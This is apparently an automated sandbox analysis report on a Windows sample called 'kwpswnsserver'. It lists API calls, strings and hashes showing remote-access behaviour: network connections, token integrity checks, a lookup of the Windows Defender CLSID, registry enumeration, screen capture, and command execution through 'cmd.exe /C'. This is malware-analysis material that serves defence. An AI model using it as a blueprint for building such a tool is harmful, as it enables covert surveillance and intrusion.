                                                                  • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                  • String ID: &
                                                                  • API String ID: 640422297-3042966939
                                                                  • Opcode ID: 9aa1895cb4b42337261f11cd3cf797da11cda727b91545088d4f900a7fd48aa4
                                                                  • Instruction ID: 7b7795262fced4a9dcd42cf9360b7a9076dd78b7372c6375c5445139271d0164
                                                                  • Opcode Fuzzy Hash: 9aa1895cb4b42337261f11cd3cf797da11cda727b91545088d4f900a7fd48aa4
                                                                  • Instruction Fuzzy Hash: 27D13FF1B102199BDB20DF55DC84BAAB7B4EF48314F0085ADE609A7201D774AEC5CFA9

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ResetEvent.KERNEL32(?), ref: 04272DBB
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 04272DC7
                                                                  • timeGetTime.WINMM ref: 04272DCD
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 04272DFA
                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04272E26
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04272E32
                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04272E51
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04272E5D
                                                                  • gethostbyname.WS2_32(00000000), ref: 04272E6B
                                                                  • htons.WS2_32(?), ref: 04272E8D
                                                                  • connect.WS2_32(?,?,00000010), ref: 04272EAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                  • String ID: 0u
                                                                  • API String ID: 640718063-3203441087
                                                                  • Opcode ID: 53c05309b8fc4a9c63bbe3b2a2dfaebfa5ee0fd5adaf811f02822aa6349821b9
                                                                  • Instruction ID: e184d76835421f93e1256d162cdbb277f5e04890d097c0cd2589d94238db1257
                                                                  • Opcode Fuzzy Hash: 53c05309b8fc4a9c63bbe3b2a2dfaebfa5ee0fd5adaf811f02822aa6349821b9
                                                                  • Instruction Fuzzy Hash: E3615071B50304BFE720DFA8EC45FAAB7B8FF48B10F104569F655A72C0DAB4A9048B65

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 04276A94
                                                                  • wsprintfW.USER32 ref: 04276AA7
                                                                    • Part of subcall function 04276910: GetCurrentProcessId.KERNEL32(5EF26BF0,00000000,00000000,75BF73E0,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276938
                                                                    • Part of subcall function 04276910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276947
                                                                    • Part of subcall function 04276910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276960
                                                                    • Part of subcall function 04276910: CloseHandle.KERNEL32(00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 0427696B
                                                                  • _memset.LIBCMT ref: 04276AC2
                                                                  • GetVersionExW.KERNEL32(?), ref: 04276ADB
                                                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 04276B12
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 04276B19
                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04276B3F
                                                                  • GetLastError.KERNEL32 ref: 04276B49
                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 04276B5D
                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04276B85
                                                                  • GetSidSubAuthorityCount.ADVAPI32 ref: 04276B98
                                                                  • GetSidSubAuthority.ADVAPI32(00000000), ref: 04276BA6
                                                                  • LocalFree.KERNEL32(?), ref: 04276BB5
                                                                  • CloseHandle.KERNEL32(?), ref: 04276BC2
                                                                  • wsprintfW.USER32 ref: 04276C1B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                  • String ID: -N/$NO/$None/%s
                                                                  • API String ID: 3036438616-3095023699
                                                                  • Opcode ID: d34d8821fd75beef8aaa88ad26cc3dc62175e7e487746cae1db95eb3e9fedb90
                                                                  • Instruction ID: e7b0a88417406900516f498f12049b9a4f9477f5a0c8da0ba96cb7ecc7237573
                                                                  • Opcode Fuzzy Hash: d34d8821fd75beef8aaa88ad26cc3dc62175e7e487746cae1db95eb3e9fedb90
                                                                  • Instruction Fuzzy Hash: 7541B271B10615BFDB249F64DC8CFEA7B78EB09724F004499E609A6141EA38ED94CFB1

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0427AD53
                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0427AD73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValue
                                                                  • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                  • API String ID: 4153817207-1338088003
                                                                  • Opcode ID: 767c3af064364780efb90f9b79d82b6984eaabf9398dab9a38cf9f5c0d384725
                                                                  • Instruction ID: 6c83f0a46ae544b974668804acb694343be5b13989cebb74bc26636ced55d55c
                                                                  • Opcode Fuzzy Hash: 767c3af064364780efb90f9b79d82b6984eaabf9398dab9a38cf9f5c0d384725
                                                                  • Instruction Fuzzy Hash: 1DC1D2B1B10201ABE710EF24DC45F6B73A8EF94718F140568F9499B281E7B5F914CBA2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0427618B
                                                                  • lstrcatW.KERNEL32(042A1F10,0429510C,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 042761CD
                                                                  • lstrcatW.KERNEL32(042A1F10,0429535C,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 042761D9
                                                                  • CoCreateInstance.OLE32(04292480,00000000,00000017,0429578C,?,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 04276220
                                                                  • _memset.LIBCMT ref: 042762CE
                                                                  • wsprintfW.USER32 ref: 04276336
                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0427635F
                                                                  • _memset.LIBCMT ref: 04276376
                                                                    • Part of subcall function 04276050: _memset.LIBCMT ref: 0427607C
                                                                    • Part of subcall function 04276050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04276088
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                  • API String ID: 1221949200-1583895642
                                                                  • Opcode ID: d30e6f33934134326311c794a3ffe5ae3e1429b6b5a6f460e9e4a1d1b80459d8
                                                                  • Instruction ID: ca122e894d8e76646722f8b8a1c75d99a2b33bbdd58ef015f5100cd026916b16
                                                                  • Opcode Fuzzy Hash: d30e6f33934134326311c794a3ffe5ae3e1429b6b5a6f460e9e4a1d1b80459d8
                                                                  • Instruction Fuzzy Hash: 708194B1B50228ABDB20DB54CC44FAEB7B8EB48714F0445C8F709A7141D674AE85CFA4

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cleanup$closesocket$AllocStartupVirtualconnectfreeaddrinfogetaddrinforecvsocket
                                                                  • String ID: $@
                                                                  • API String ID: 1138076629-1077428164
                                                                  • Opcode ID: 761546856006ac92e495809081b184eb77bfbe2a8da205b858165cfd52332ac5
                                                                  • Instruction ID: 6fae05632bdb5788f681e663a0936a08e495d84d52abf287e74db719567fead7
                                                                  • Opcode Fuzzy Hash: 761546856006ac92e495809081b184eb77bfbe2a8da205b858165cfd52332ac5
                                                                  • Instruction Fuzzy Hash: 03F1D9B4A14259CFCB64DF68C98879DBBF0AB0A304F4085AAD84DE7750E7349E85CF52

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 04275F66
                                                                  • GetLastError.KERNEL32 ref: 04275F6E
                                                                  • Sleep.KERNEL32(000003E8), ref: 04275F85
                                                                  • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 04275F90
                                                                  • GetLastError.KERNEL32 ref: 04275F92
                                                                  • _memset.LIBCMT ref: 04275FB9
                                                                  • lstrlenW.KERNEL32(?), ref: 04275FC6
                                                                  • lstrcmpW.KERNEL32(?,04295328), ref: 04275FED
                                                                  • Sleep.KERNEL32(000003E8), ref: 04275FF8
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 04276005
                                                                  • GetConsoleWindow.KERNEL32 ref: 0427600F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                  • String ID: 2024.12. 3$key$open
                                                                  • API String ID: 2922109467-4129338558
                                                                  • Opcode ID: 2b76f90e87e754fda1a64f6f6dbab00ba01e9d2bcca1d914076e6d1fbd5c47a3
                                                                  • Instruction ID: f76efaddaad56bd6764240642cb728c72e8f4340be85d8501dd66da81fd0cd5d
                                                                  • Opcode Fuzzy Hash: 2b76f90e87e754fda1a64f6f6dbab00ba01e9d2bcca1d914076e6d1fbd5c47a3
                                                                  • Instruction Fuzzy Hash: E421B672B54306BBE714DB64EC49B5AB394EB94714F100819E604971C1DEB4BD49CBB3

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 042762CE
                                                                  • wsprintfW.USER32 ref: 04276336
                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0427635F
                                                                  • _memset.LIBCMT ref: 04276376
                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 042763B2
                                                                  • lstrcatW.KERNEL32(042A1F10,?), ref: 042763CE
                                                                  • lstrcatW.KERNEL32(042A1F10,0429535C), ref: 042763DA
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 042763E3
                                                                  • lstrlenW.KERNEL32(042A1F10,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 04276427
                                                                  • lstrcatW.KERNEL32(042A1F10,042953D4,?,5EF26BF0,00000AD4,00000000,75BF73E0), ref: 0427643B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                  • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                  • API String ID: 1671694837-1583895642
                                                                  • Opcode ID: c8e57cfa0f1aee302b6936a443c711b00d07b4e01a77f18b0ac71747bdaeecaf
                                                                  • Instruction ID: a81993d17064e6151b4cfef7649942224cec503b6dee4bb5a49f89f8c4dc0746
                                                                  • Opcode Fuzzy Hash: c8e57cfa0f1aee302b6936a443c711b00d07b4e01a77f18b0ac71747bdaeecaf
                                                                  • Instruction Fuzzy Hash: 214190B1B50268ABDB24DB94CC54FAEB7B8AB48704F0041C8F309A7181DA74AE84CF64

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,04275611,0000035E,000002FA), ref: 0427749C
                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 042774B2
                                                                  • swprintf.LIBCMT ref: 042774EF
                                                                    • Part of subcall function 04277410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04277523), ref: 0427743D
                                                                    • Part of subcall function 04277410: GetProcAddress.KERNEL32(00000000), ref: 04277444
                                                                    • Part of subcall function 04277410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04277523), ref: 04277452
                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04277547
                                                                  • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04277563
                                                                  • RegCloseKey.KERNEL32(000002FA), ref: 04277586
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,04275611,0000035E,000002FA), ref: 04277598
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                  • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                  • API String ID: 2158625971-3190923360
                                                                  • Opcode ID: 2e15cc60ba080d24395dca92e03c87130d85ea3ca8a9c3ad795fa6634c7c57fb
                                                                  • Instruction ID: 86fad895b0a97e8a30f8dc7cd81958a0529f1e3ee2798918ac0dfc6b6986ce98
                                                                  • Opcode Fuzzy Hash: 2e15cc60ba080d24395dca92e03c87130d85ea3ca8a9c3ad795fa6634c7c57fb
                                                                  • Instruction Fuzzy Hash: D731B672B50209BBEB14DBA8DD45EBF7BBCDF48740F140559BA05A6141EA74FE04CBA0
                                                                  APIs
                                                                    • Part of subcall function 6C8720A0: GetModuleFileNameA.KERNEL32 ref: 6C8720D3
                                                                    • Part of subcall function 6C871F60: SHGetFolderPathA.SHELL32 ref: 6C871FBB
                                                                  • Sleep.KERNEL32 ref: 6C872638
                                                                  • Sleep.KERNEL32 ref: 6C872C72
                                                                  • WinExec.KERNEL32 ref: 6C872E84
                                                                  • WinExec.KERNEL32 ref: 6C8730DB
                                                                  • Sleep.KERNEL32 ref: 6C8730EB
                                                                    • Part of subcall function 6C872040: DeleteFileA.KERNEL32(?,?,?,?,6C873107), ref: 6C872055
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExecFile$DeleteFolderModuleNamePath
                                                                  • String ID: #$L$M$X$cmd.exe /C $cmd.exe /C
                                                                  • API String ID: 2783004147-3173768389
                                                                  • Opcode ID: 0aa89c9a7fa0179653c5eb9a49a565188820d5ff941c7d16073859f97d99c232
                                                                  • Instruction ID: 0051ba51fe67837ab7ea09e10bf430a041e38bb4e44a04d5c28164f9a2d0d41b
                                                                  • Opcode Fuzzy Hash: 0aa89c9a7fa0179653c5eb9a49a565188820d5ff941c7d16073859f97d99c232
                                                                  • Instruction Fuzzy Hash: EBA23A71D00258CADB35DF28DE586DCBBB0AB15304F0086EAC45967B91EB745B8CCFA2
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000002,?,5EF26BF0,?,00000000,?), ref: 0427C09E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0427C0AA
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0427C0BF
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0427C0D5
                                                                  • EnterCriticalSection.KERNEL32(0429FB64), ref: 0427C113
                                                                  • LeaveCriticalSection.KERNEL32(0429FB64), ref: 0427C124
                                                                    • Part of subcall function 04279DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04279E04
                                                                    • Part of subcall function 04279DE0: GdipDisposeImage.GDIPLUS(?), ref: 04279E18
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0427C14C
                                                                    • Part of subcall function 0427A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0427A48D
                                                                    • Part of subcall function 0427A460: _free.LIBCMT ref: 0427A503
                                                                  • GetHGlobalFromStream.OLE32(?,?), ref: 0427C16D
                                                                  • GlobalLock.KERNEL32(?), ref: 0427C177
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0427C18F
                                                                    • Part of subcall function 04279BA0: DeleteObject.GDI32(?), ref: 04279BD2
                                                                    • Part of subcall function 04279BA0: EnterCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279BE3
                                                                    • Part of subcall function 04279BA0: EnterCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279BF8
                                                                    • Part of subcall function 04279BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,04279B7B), ref: 04279C04
                                                                    • Part of subcall function 04279BA0: LeaveCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279C15
                                                                    • Part of subcall function 04279BA0: LeaveCriticalSection.KERNEL32(0429FB64,?,?,?,04279B7B), ref: 04279C1C
                                                                  • GlobalSize.KERNEL32(00000000), ref: 0427C1A5
                                                                  • GlobalUnlock.KERNEL32(?), ref: 0427C221
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0427C249
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                  • String ID:
                                                                  • API String ID: 1483550337-0
                                                                  • Opcode ID: 5ffa1b7d140446bb1695d78d618e2b87dcccfa2e0fb26acc56f5e3bf59931f62
                                                                  • Instruction ID: bcf4931a31b6a4ab7e12878764c48eefe9fde8c04f94ea689d15560584283a57
                                                                  • Opcode Fuzzy Hash: 5ffa1b7d140446bb1695d78d618e2b87dcccfa2e0fb26acc56f5e3bf59931f62
                                                                  • Instruction Fuzzy Hash: 7A6169B1E10218EFDB14EFE9E88899EBBB8FF49310F104529E515A7201DB34AD05CFA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 042764C2
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 042764E2
                                                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 04276524
                                                                  • _memset.LIBCMT ref: 04276560
                                                                  • _memset.LIBCMT ref: 0427658E
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 042765BA
                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 042765C3
                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 042765D5
                                                                  • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 04276625
                                                                  • lstrlenW.KERNEL32(?), ref: 04276635
                                                                  Strings
                                                                  • Software\Tencent\Plugin\VAS, xrefs: 042764D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                  • String ID: Software\Tencent\Plugin\VAS
                                                                  • API String ID: 2921034913-3343197220
                                                                  • Opcode ID: 122895ba454c147c97f665aae1a7e0a56bab5a126f5a1d3892a6075443bcaa42
                                                                  • Instruction ID: 1044b5b1c0501305e3ad5321ca085c36d0d12dc4c63a511a495b31d9c75c0a00
                                                                  • Opcode Fuzzy Hash: 122895ba454c147c97f665aae1a7e0a56bab5a126f5a1d3892a6075443bcaa42
                                                                  • Instruction Fuzzy Hash: B341C5F1B10219BBDB24DB54DD85FEA7378DB44700F4045D9E309B7081EA74AE858FA4
                                                                  APIs
                                                                    • Part of subcall function 04275320: InterlockedDecrement.KERNEL32(00000008), ref: 0427536F
                                                                    • Part of subcall function 04275320: SysFreeString.OLEAUT32(00000000), ref: 04275384
                                                                    • Part of subcall function 04275320: SysAllocString.OLEAUT32(04295148), ref: 042753D5
                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,04295148,042769A4,04295148,00000000,75BF73E0), ref: 042767F4
                                                                  • GetLastError.KERNEL32 ref: 042767FE
                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04276816
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0427681D
                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0427683F
                                                                  • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 04276871
                                                                  • GetLastError.KERNEL32 ref: 0427687B
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 042768E6
                                                                  • HeapFree.KERNEL32(00000000), ref: 042768ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                  • String ID: NONE_MAPPED
                                                                  • API String ID: 1317816589-2950899194
                                                                  • Opcode ID: be359d957736d13ce169231d5f69cf47054ccb4d66b509241e44d4a1bf06b118
                                                                  • Instruction ID: 52702b6528051ef0e8cd1aae6cf2235065080234e52b1e1e7bd7e3982588a49f
                                                                  • Opcode Fuzzy Hash: be359d957736d13ce169231d5f69cf47054ccb4d66b509241e44d4a1bf06b118
                                                                  • Instruction Fuzzy Hash: BA4182B1B10219BFDB249F64DD48FEAB378EB85700F404599E609A7140DE786E898F74
                                                                  APIs
                                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0427A48D
                                                                  • _malloc.LIBCMT ref: 0427A4D1
                                                                  • _free.LIBCMT ref: 0427A503
                                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0427A522
                                                                  • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0427A594
                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 0427A59F
                                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0427A5C5
                                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 0427A5DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                  • String ID: &
                                                                  • API String ID: 2794124522-3042966939
                                                                  • Opcode ID: a0ac149bbd708247a34d0875e0fc0d7d64f8564a2e7273a7db19b743e046b265
                                                                  • Instruction ID: 8a2f92492a63d80e72949733354578b3d73ae9f7454fcb8b926ebc3c6bdf64d6
                                                                  • Opcode Fuzzy Hash: a0ac149bbd708247a34d0875e0fc0d7d64f8564a2e7273a7db19b743e046b265
                                                                  • Instruction Fuzzy Hash: 1B5173B1F20215AFDB04DFA4D884AEEB7B8EF48354F048119E906A7250E734BD45CBA5
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C8947D0,?,6C889345,?,6C893C90), ref: 6C8A52AE
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,?,?,?,?,6C8947D0,?,6C889345,?,6C893C90), ref: 6C8A5320
                                                                  • GlobalHandle.KERNEL32(6C851B41), ref: 6C8A532A
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C8A533C
                                                                  • GlobalReAlloc.KERNEL32(?,00000000), ref: 6C8A5357
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C8A5362
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8A53AF
                                                                  • GlobalHandle.KERNEL32(6C851B41), ref: 6C8A53C3
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C8A53CE
